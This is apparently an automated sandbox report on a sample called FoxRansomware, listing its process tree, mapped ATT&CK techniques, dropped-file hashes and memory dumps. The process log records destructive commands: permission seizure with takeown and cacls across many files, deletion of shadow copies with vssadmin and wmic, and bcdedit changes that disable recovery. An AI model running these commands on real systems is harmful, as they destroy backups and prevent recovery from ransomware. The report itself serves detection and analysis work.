- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:4256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:2796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:5316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:4228
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:5256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:2448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:4620
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:5916
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:5920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:4316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    - Modifies file permissions
    PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:2936
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:4820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:2132
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:4832
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:5984
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:6072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:2632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:6088
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:2492
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:5104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:4336
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:4392
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:3432

C:\Windows\system32\taskeng.exe
taskeng.exe {BB268B7E-7B08-4EE7-A44C-7390BDAA937C} S-1-5-21-2610426812-2871295383-373749122-1000:UEITMFAB\Admin:Interactive:[1]
1⤵
PID:3780
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat"
  2⤵
  PID:1632
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:5756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3792
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5848
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5892
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:4188

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\106.0.5249.119\#KOK8_README#.rtf

Filesize
8KB

MD5
bffc5d47fee2e9a2756efbc8ec63da3d

SHA1
1e213785f2d562d1e42e3eba43d58d0b6f992e1e

SHA256
3974c8f565f0258692aaca4a5f6b48a509e59940efa26121ddb9fe31ad0322ca

SHA512
9717ea8a597db7f0a6d321e1c751a27f4b70722fd1685728558052af851db55ba89477abe5e0be1985a4a6ee3275020bd03a3b473db409a6e0637098c0ad29c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\2AtfLWqd.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
67B

MD5
56f01c945da71ba4a51f6845a6747002

SHA1
606c88937597df715d9fe99110f026b80e7935c3

SHA256
e7bff9fb06417d8c3a8ab41463f2e4cbd5d161e66f62608f22df5505ef38490d

SHA512
9e227faf2d6e612b74a2fe37f3095e3c096c55e8e0a3f550d5a00bb0ff036f16101a4ba6892179c73326bef2aa2a7fe55a99aa072165c91f95a9f2a2d66d5f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
915B

MD5
f5e1360401b2588a2b262d6f6ba35dc1

SHA1
8486063b21fcca511deb205f4d894ad68660eace

SHA256
b8bb65c51376310d894487be7997b41906597a97b24c6617db37b94b6273ebeb

SHA512
685260cf27f9ec99139720515201fd92d057a9d7a5e36e93d0d2b71e3ef1d901686751e8d4d22f222b1356dbcdff0f044ac953eb20b9356e5f512394e049c0c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
1KB

MD5
952008b83944efe247910cf1e6c3806c

SHA1
d5abd85c5b6ef048353ae8ce8201328f1c77d414

SHA256
19440bc388e641419666c407749412663ae87f057b9787d6cc8758f5a147b22f

SHA512
c8ed3c0a5314dfda7c786e12990e308f6054e45403248105071c66194609f1ee9321ea7d75647b7228195a1c02a70bfc63ed3912b30b9720b230d2ced8f0629a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
2KB

MD5
195c88170be28a37c4a8d03b312685b1

SHA1
0a156f49194af924f9fb15a5d3e83a14f8417c84

SHA256
27db24f45060d653daf0362fd330efbbb30417f447d0c693283fc03e4cf376f4

SHA512
21d04b46018c2f8b1793e0a2403224460fbe13ef06aa4df736784659aa6ee419a440b7c0b1763df87c96b9139eda64633c9f2fe27e126dfa2d0625dc971c9fda

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
2KB

MD5
5d68396f262ea617a2b18d392163169a

SHA1
1df557d631bf178437a3d307722d0fad211b6f4a

SHA256
fa5be9217f6508d7ee518c734ad36d5be8e50ccd0ad87381cf9604a8841204b3

SHA512
009aec3c0edd9ad5c6141deee665699b1211393e79718fec1338e827c612062a464f7cf3a720a83046c15bdb44b610f22ebf78284a2662053f229f3ee66d491e

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_4DA22BE0A5EC54A8.txt

Filesize
4KB

MD5
6eb19fa28a1c6f8dbe4e9c05cdcbf378

SHA1
4f8e1ca429f4e937f8fb90f2dd61fe37afa52bb6

SHA256
66f7e3486aa4955ceea56a5f2b4fdefb2310bdf556a4c27641d122711b8efdf8

SHA512
b8bb5f6d412a859cfbb49f73ac8f7012476deb92f344cf88f6dc94b1c1e680ca51f8c78ceda4a7c6d6b1472ac0aca3f31f540ce3954906716b47fbefad5b692e

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_4DA22BE0A5EC54A8.txt

Filesize
25KB

MD5
dd87c43a7357ba37cc565ff43da8c46a

SHA1
bf7156709f95f0a36fedd7de51f5cdb89ddc175a

SHA256
228617269ab22b0a27f9e2a2e5f30770fd5e395d41246d77f686d68f8be9701e

SHA512
eb5f52af97bd7e18ffed22b0d86bae7b4436f6043b80ace459f6cdddf8778f118dea217c07eb3123e61dab8b221bf2830ffba7b78b6ce595373bfa9f05197728

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat

Filesize
226B

MD5
d9582375f5eb07a4b06afc3e6f68522c

SHA1
da1f9097d8190f15acd4d1f3b8b738afc4941f82

SHA256
f2571d572e31de6ed10a07b660dcfbc5b95b30f346f6b4f3c30ce936457d0595

SHA512
71502cf71059ea665df4dc84c9197b947088b22141b241f31eb992e0729870cb1a815a2d68d9d0d6405d0747d429f535935960726da8076387a4e91b59ee3c6c

Download Submit
C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat

Filesize
265B

MD5
a3138b20a34a7f366b00f9c1ac928724

SHA1
801ac583794a386078896a2dfc325f31f9b6d7c5

SHA256
1fb55ca1ded788db9eb4931b700b842c3606f493e3386b7ee82cbec8c6dd2fd2

SHA512
23cff32151120da765724f57d20e85b79eb4fc0d317a9729fe0bf61555310c625a32fb890ef5ab3399367d536a13da1571ee9181f49d1722502a8df2aec4f6ce

Download Submit
C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs

Filesize
260B

MD5
3324224f59c74c523ab7c9b017cf1c91

SHA1
0f613d2b03aecabaee12ba1ac2fe6c408c8845b9

SHA256
c699dcdbf72f835d4ed34b3cdc1f65105e95a5a964eb9af18308519f701acd24

SHA512
07017422d2f1e21ac3a8533674ac298d7ea32ce49f25cb667b18c4041b6ca8af49451377916214af05e252357bb247aa2464def13c917121d7f4447f32b1dc38

Download Submit
\Users\Admin\AppData\Local\Temp\D22bUU4y64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe

Filesize
1.2MB

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
memory/796-7808-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/796-7809-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/936-6875-0x0000000000510000-0x0000000000587000-memory.dmp

Filesize
476KB

Download
memory/1084-7812-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1184-7844-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1184-7845-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1472-7786-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1608-7821-0x0000000001FF0000-0x0000000002067000-memory.dmp

Filesize
476KB

Download
memory/1640-7861-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1640-7890-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1672-7834-0x0000000001F20000-0x0000000001F97000-memory.dmp

Filesize
476KB

Download
memory/1688-7799-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1692-7859-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1692-7879-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1720-7772-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1772-7948-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2072-7802-0x0000000000470000-0x00000000004E7000-memory.dmp

Filesize
476KB

Download
memory/2132-5396-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2132-5444-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2168-7841-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2168-6997-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2200-7796-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2276-7815-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2332-7863-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2356-7780-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2420-7833-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2452-7830-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2468-7943-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2476-7805-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2636-7824-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2640-13-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

Filesize
256KB

Download
memory/2640-16-0x0000000074360000-0x000000007490B000-memory.dmp

Filesize
5.7MB

Download
memory/2640-12-0x0000000074360000-0x000000007490B000-memory.dmp

Filesize
5.7MB

Download
memory/2640-14-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

Filesize
256KB

Download
memory/2640-15-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

Filesize
256KB

Download
memory/2640-11-0x0000000074360000-0x000000007490B000-memory.dmp

Filesize
5.7MB

Download
memory/2696-7827-0x00000000002C0000-0x0000000000337000-memory.dmp

Filesize
476KB

Download
memory/2708-5959-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2720-7870-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2732-8-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2868-1314-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2868-7857-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2868-7735-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2952-7768-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3032-6796-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3168-7919-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3172-7920-0x0000000002030000-0x00000000020A7000-memory.dmp

Filesize
476KB

Download
memory/3196-7843-0x00000000001B0000-0x0000000000227000-memory.dmp

Filesize
476KB

Download
memory/3360-7878-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3400-7880-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3424-7851-0x0000000000190000-0x0000000000207000-memory.dmp

Filesize
476KB

Download
memory/3496-7850-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3552-7852-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3552-7853-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3672-7013-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3716-7914-0x00000000001C0000-0x0000000000237000-memory.dmp

Filesize
476KB

Download
memory/3736-7915-0x00000000002B0000-0x0000000000327000-memory.dmp

Filesize
476KB

Download
memory/3768-7917-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3892-7922-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3912-1342-0x0000000000120000-0x0000000000197000-memory.dmp

Filesize
476KB

Download
memory/3912-7011-0x0000000000120000-0x0000000000197000-memory.dmp

Filesize
476KB

Download
memory/3936-1353-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4040-7891-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4116-7935-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4160-7924-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4216-7936-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4236-5390-0x0000000000160000-0x00000000001D7000-memory.dmp

Filesize
476KB

Download
memory/4248-7939-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4276-7940-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4292-7942-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4312-7760-0x0000000000270000-0x00000000002E7000-memory.dmp

Filesize
476KB

Download
memory/4404-5963-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4436-7899-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4480-7883-0x0000000000350000-0x00000000003C7000-memory.dmp

Filesize
476KB

Download
memory/4504-7895-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
